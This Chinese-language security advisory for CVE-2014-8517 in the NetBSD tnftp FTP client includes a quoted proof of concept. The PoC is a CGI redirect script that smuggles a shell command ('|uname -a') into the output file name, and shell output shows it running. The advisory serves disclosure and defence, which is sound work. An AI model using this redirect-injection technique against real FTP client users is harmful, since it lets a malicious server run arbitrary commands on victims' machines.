发布日期:2014-10-29
更新日期:2014-10-30
受影响系统:
NetBSD tnftp
描述:
CVE(CAN) ID: CVE-2014-8517
tnftp是广泛使用的NetBSD FTP客户端。
tnftp存在安全漏洞导致攻击者可以执行任意命令。此漏洞影响多个版本Linux(Fedora, Debian, NetBSD, FreeBSD, OpenBSD)及Apple Yosemite 10.10。
受害者使用"ftp http://server/path/file.txt"命令,而没有使用"-o"参数来指定输出文件时,恶意服务器可以通过tnftp来执行任意命令。
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jared Mcneill ()提供了如下测试方法:
If you do "ftp http://server/path/file.txt"; and don't specify an output
filename with -o, the ftp program can be tricked into executing
arbitrary commands.
The FTP client will follow HTTP redirects, and uses the part of the
path after the last / from the last resource it accesses as the output
filename (as long as -o is not specified).
After it resolves the output filename, it checks to see if the output
filename begins with a "|", and if so, passes the rest to
popen(3): http://nxr.netbsd.org/xref/src/usr.bin/ftp/fetch.c#1156
Here's a simple CGI script that causes ftp to execute "uname -a", the
issue is present on both NetBSD 7.99.1 and OSX 10.10:
a20$ pwd
/var/www/cgi-bin
a20$ ls -l
total 4
-rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect
-rwxr-xr-x 1 root wheel 178 Oct 14 01:54 |uname -a
a20$ cat redirect
#!/bin/sh
echo 'Status: 302 Found'
echo 'Content-Type: text/html'
echo 'Connection: keep-alive'
echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
echo
a20$
a20$ ftp http://localhost/cgi-bin/redirect
Trying ::1:80 ...
ftp: Can't connect to `::1:80': Connection refused
Trying 127.0.0.1:80 ...
Requesting http://localhost/cgi-bin/redirect
Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
Requesting http://192.168.2.19/cgi-bin/|uname%20-a
32 101.46 KiB/s
32 bytes retrieved in 00:00 (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
ADT 2014
Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
BOARD evbarm
a20$
建议:
厂商补丁:
NetBSD
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
1194
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
